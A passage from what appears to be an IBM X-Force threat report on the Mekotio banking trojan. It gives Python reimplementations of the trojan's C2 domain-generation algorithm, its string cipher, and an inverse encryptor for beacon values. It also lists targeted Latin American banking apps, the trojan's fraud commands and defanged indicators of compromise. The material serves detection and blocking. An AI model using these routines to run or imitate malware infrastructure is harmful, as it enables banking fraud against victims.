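        domains.add(c2_domain(year, month, day, inside.hour, inside.minute, mode=2))
    return sorted(domains)


if __name__ == "__main__":
    # 16 September 2024, 09:42: the date and time used in the report's walkthrough.
    print(seed_string(2024, 9, 16, 9, 42, mode=1), "->", c2_domain(2024, 9, 16, 9, 42, mode=1))
    print(seed_string(2024, 9, 16, 9, 42, mode=2), "->", c2_domain(2024, 9, 16, 9, 42, mode=2))
    for d in daily_blocklist(2024, 9, 16):
        print(d)
```

The report’s own results for 16 September (subdomains 3cd99dd0981c76e5a7b9 and 4e342df890dd9fb169e0 under doomdns[.]com) are the values to check the case and padding assumptions against: if the digests produced for “1609mkro” and “MON16AM04mkro” do not start with those strings, adjust the seed formatting before trusting the blocklist.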

Behavior

Just like most other banking trojans, all specific functionality of Mekotio requires sensitive strings. These are decrypted at runtime to avoid static detections. Mekotio uses an old algorithm which is among the most common ones in LATAM banking trojans, and has been used as such or in slight variations with other bankers including Grandoreiro, Ousaban and Astaroth/Guildma. It has been documented numerous times before, but the following is an example Python implementation:

def decrypt(ct, key):
    # ct: hex-encoded ciphertext; key: the key as bytes (a str is encoded as ASCII)
    if isinstance(key, str):
        key = key.encode()
    ct = bytes.fromhex(ct)
    plaintext = ""
    for i in range(1, len(ct)):          # ct[0] only seeds the chain and yields no output
        n = ct[i] ^ key[(i - 1) % len(key)]
        c = ct[i - 1]
        c = n - c if c < n else n + 0xff - c
        plaintext += chr(c)
    return plaintext
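As an added example (not Mekotio’s own code), the following Python applies the decryption routine above to the enumeration beacon quoted in the “Command and control” section: it splits the POST body into its ordered values, takes the first value as the per-request key and decrypts the rest with it. The beacon body is the one shown in the report; the parsing helpers and the inverse (encryption) routine used for round-trip checks are additions. Using the 42-character key directly as ASCII bytes is an assumption, which the decrypted values bear out.

```python
# Beacon body quoted in the report: random names, hex ciphertext values, key first.
BEACON = (
    "dqbw802=7mvejj3zfwoD5880AhFzv62fA3n7sz8oB4nBoAB3Da&Bcdv2=D929321e3a0651A0ae94b2979e"
    "&by4ps8=067DAF75a59388eb63d56AD1474EB73F&40z0uuE=9034F4&y1ry=86FD5dF9"
    "&h5i2c8cD3=F37c8880819a78d86bF55BE04e&5c9mt=&zwCbcq=6E8389839392D52FEA31D356C73bA429ac53&83whhjc=&"
)


def mekotio_decrypt(ct_hex: str, key) -> str:
    """Standard LATAM banker string decryption: each ciphertext byte is XORed with the
    repeating key, then the previous ciphertext byte is subtracted modulo 0xff.
    ct[0] only seeds the chain (an IV) and produces no plaintext."""
    key = key.encode("ascii") if isinstance(key, str) else key
    ct = bytes.fromhex(ct_hex)
    out = []
    for i in range(1, len(ct)):
        n = ct[i] ^ key[(i - 1) % len(key)]
        c = ct[i - 1]
        out.append(chr(n - c if c < n else n + 0xFF - c))
    return "".join(out)


def mekotio_encrypt(plaintext: str, key, iv: int = 0x00) -> str:
    """Inverse of mekotio_decrypt (an addition, for round-trip testing): rebuild the XOR
    value from the plaintext byte and the previous ciphertext byte, then XOR with the key.
    Plaintext bytes must be 1..255; the scheme cannot encode NUL."""
    key = key.encode("ascii") if isinstance(key, str) else key
    ct = [iv]
    for i, p in enumerate(plaintext.encode("latin-1"), start=1):
        if p == 0:
            raise ValueError("NUL is not representable")
        c = ct[i - 1]
        n = p + c if p + c <= 0xFF else p + c - 0xFF
        ct.append(n ^ key[(i - 1) % len(key)])
    return bytes(ct).hex().upper()


def decode_beacon(body: str):
    """Split the '&'-joined 'random_name=value' pairs in order; the first value is the
    42-character key and every later value is decrypted with it (empty values stay empty)."""
    pairs = [seg.split("=", 1) for seg in body.split("&") if seg]
    if not pairs:
        raise ValueError("empty beacon body")
    key = pairs[0][1]
    if len(key) != 42:
        raise ValueError(f"expected a 42-character key, got {len(key)}")
    values = [mekotio_decrypt(v, key) if v else "" for _, v in pairs[1:]]
    return key, values


if __name__ == "__main__":
    key, values = decode_beacon(BEACON)
    print("key:", key)
    for i, v in enumerate(values):
        print(f"value {i}: {v!r}")
```

Two of the decrypted values are worth calling out when triaging a capture: a hostname of the form DESKTOP-XXXXXXX is a default Windows name and often points at a sandbox, and the version-string value (“D22” in this sample) is what a detection team should key on to track builds across captures, since the field names are randomized per request and cannot be used for that.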

The main objective of Mekotio, or any other LATAM banking trojan, is to discover the use of banking applications and attempt to manipulate the apps, web apps or the users themselves to commit banking fraud. For the initial discovery of targeted banking applications, the banking trojans include a list of strings containing the names of common financial institutions and their related apps. This list is constantly compared against the titles of open windows on the infected machine. If there is a match, the banking trojan informs the operator which exact application is in use. Mekotio contains the following list, indicating clear targeting of banking apps used throughout LATAM:

BancoDaycovalBancoMercantilCCBBrasilagibankaplicativoitaasaasatendimentoitabadesulbancoalfabancobmgbancobradescobancobs2bancodaamazoniabancodobrasilbancodoestadodoparbancodonordestebancointerbancoitabancomercantilbancooriginalbancorendimentobancotopaziobancovotorantimbanesedoseujeitobanestesbanrisulbbcombrbdmgdigitalbinancebitcointradebitfinexbitprecobitstampblockchainbnb.gov.brbradescobraziliexbrbbanknetcitibankciviacontaonlinecontasimplescoopcredcoracredinetcredisiscreditrancredsiscresolinternetbankinggerenciadorfinanceirohomebankinternetbanking.banparainternetbankingcaiitauaplicativo.exelogincaixaloginxmercadobitcoinmercadopagonavegadorexclusivopaguevelozpicpaypoloniexprimebitprimexbtpro.bitcointoyourecargapaysafranetbankingsantandsicoobsicredisisprimesisprimesofisastonetribancounicreduniprimeviacrediwise

When one of the referenced banking applications is detected, Mekotio can handle specific commands. These commands implement the following functionality:

  • Lock the applications window to prevent users from exiting
  • Grab input from the window, which might include credentials and tokens
  • Create a fake window imitating the banking application to capture credentials or tokens
  • Display or capture a QR code, which may be used to circumvent multi-factor authentication (MFA)
  • Display a token again to circumvent MFA

Mekotio contains several images designed to imitate banking applications:

Figure 13 Readily Available Application Images

Figure 14 Readily Available Application Images

Figure 15 Readily Available Application Images

Figure 16 Readily Available Application Images

In addition, Mekotio supports a list of further commands to control the infected machine, including commands to:

  • Send keystrokes, mouse movement, clicks or scrolls
  • Display windows with custom text
  • Send or receive clipboard data
  • Change C2 modes
  • Beacon/Ping C2
  • Kill process “core.exe” associated with banking security software
  • Kill browsers
  • Maximize browser windows
  • Show taskbar
  • Send system enumeration data
  • Take screenshots
  • Constantly check for windows such as “Task Manager” and “Warning” and immediately close them

Another interesting functionality exhibited by Mekotio is a feature internally called “Troca sistema de lugar”, Portuguese for roughly “move the system elsewhere”. Mekotio sends an HTTP GET request to retrieve an encrypted string stored at: 

https://api.cacher[.]io/raw/484822a63a80cb632f44/3b169ddbbaa8dcf4255c/my

The string contains a key and encrypted data between hardcoded separators, which reveal a list of further download URLs hosted on Google Firebase:

https://firebasestorage[.]googleapis[.]com/v0/b/drop-a82ec.appspot.com/o/fire.txt?alt=media&token=096bbc3c-d9eb-4010-a8c7-36d51874bff7
https://firebasestorage[.]googleapis[.]com/v0/b/drop-a82ec.appspot.com/o/fire?alt=media&token=8c582627-8a00-4e3d-9bc5-9b657ad0f135

Both URLs host the same 40KB JSON file. Mekotio downloads this file as part of the next stage of the process. 

Figure 17 JSON File Contents

The JSON file contains two lists, “diretorioraiz” (root directory) and “nomesdiretorio” (directory names). The former contains four system directories, and the latter appears to be a large list of folder names related to video games. Although the exact purpose of these contents is not clear, Mekotio appears to randomly select a root directory and a folder name from the lists, create the folder, and copy its files to the new location. Afterwards, it re-establishes persistence through the registry Run key. 

Conclusion:

Hive0147 is just one of dozens of malware distributors enabling the cybercrime ecosystem in LATAM. IBM X-Force is observing an increase in threats targeting the region with newly developed malware such as Picanha, and high volumes of phishing campaigns. Ultimately, the close collaboration between LATAM cybercrime groups should urge defenders to collaborate just as closely. By making full use of threat intelligence to stay informed about the latest threats and best practices, individuals and organizations can mitigate the risks associated with banking trojans and protect themselves from financial loss. To combat these threats and ensure a secure digital future for the region requires a strong cooperation between governments, financial institutions, law enforcement, and security researchers.

Technical recommendations:

IBM X-Force encourages organizations that may be impacted by these campaigns to review the following recommendations:

  • Exercise caution with emails and PDFs prompting a file download
  • Monitor emails for URLs abusing cloud service domains such as “app.goo.gl” for phishing
  • Monitor registry Run keys used for persistence
  • HKEY_CURRENT_USER\Environment\UserInitMprLogonScript
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  • Consider blocking pre-calculated DGA domains via DNS
  • Install and configure endpoint security software
  • Update relevant network security monitoring rules
  • Educate staff on the potential threats to the organization

Indicators of compromise:

Indicator | Indicator type | Context
https://yhv6e.app.goo[.]gl/ASmaxYfRW4Eh9j34A | URL | Hive0147 phishing URL
https://xek99.app.goo[.]gl/g21ytBravSMDQb7H6 | URL | Hive0147 phishing URL
d5800c06fe27cf0c6858ea7e02c8b2d35d7a76a93077f9ca6e41878603c38ef3 | SHA256 | Picanha downloader stage 1
olukv[.]familyrealstore[.]com | Domain | Picanha download domain
khqry[.]vitapronobisfassolution[.]com[.]br | Domain | Picanha download domain
izlhu[.]ometodoseroficial[.]com | Domain | Picanha download domain
jmaah[.]clicktelefoniaempresarial[.]com[.]br | Domain | Picanha download domain
sohye[.]topracoes[.]com | Domain | Picanha download domain
tjqty[.]deccsmagazine[.]com[.]br | Domain | Picanha download domain
ljoea[.]curasdanatureza[.]com | Domain | Picanha download domain
zpguk[.]cozinhaofertas[.]com | Domain | Picanha download domain
hzfzx[.]khadicomunicacao[.]com[.]br | Domain | Picanha download domain
dyicn[.]ofertadsn[.]com[.]br | Domain | Picanha download domain
39222481d69aa4d92a5c4d5c094a86909ebff762f6336f1a186fa94d3cc01012 | SHA256 | Legitimate application
4e62a102a00b071ee9f7b7e6ace0d558e18ba1a61a937676c4460a0f33a3e87e | SHA256 | Picanha stage 2 DLL
18b09a8dfb6b553f355382127a67ad1ba5909b442e0e9fadb7ebd7d89675ea9b | SHA256 | Encrypted Mekotio payload
6a5db2fe1deabd14864a8d908169e4842c611581bdc3357fa597a8fbbc37baf6 | SHA256 | Decrypted Mekotio banking trojan
3cd99dd0981c76e5a7b9[.]doomdns[.]com | Domain | Mekotio example DGA domain
4e342df890dd9fb169e0[.]doomdns[.]com | Domain | Mekotio example DGA domain
177.235.219[.]126 | IP | Mekotio fallback C2 server
https://api.cacher[.]io/raw/484822a63a80cb632f44/3b169ddbbaa8dcf4255c/my | URL | Mekotio component download URL
https://firebasestorage[.]googleapis[.]com/v0/b/drop-a82ec.appspot.com/o/fire.txt?alt=media&token=096bbc3c-d9eb-4010-a8c7-36d51874bff7 | URL | Mekotio component download URL
https://firebasestorage[.]googleapis[.]com/v0/b/drop-a82ec.appspot.com/o/fire?alt=media&token=8c582627-8a00-4e3d-9bc5-9b657ad0f135 | URL | Mekotio component download URL

